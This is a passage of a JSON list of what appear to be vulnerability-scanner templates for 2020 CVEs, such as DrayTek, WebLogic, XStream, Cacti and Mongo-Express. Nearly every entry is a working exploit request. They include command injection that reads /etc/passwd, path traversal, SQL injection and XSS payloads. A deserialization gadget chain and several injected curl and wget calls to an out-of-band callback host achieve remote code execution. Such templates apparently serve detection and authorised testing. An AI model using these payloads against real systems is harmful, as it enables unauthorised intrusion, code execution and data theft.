Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-12124","info":{"name":"WAVLINK WN530H4 live_api.cgi - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"word","part":"body","words":["WiFiBand"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Event Espresso","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory 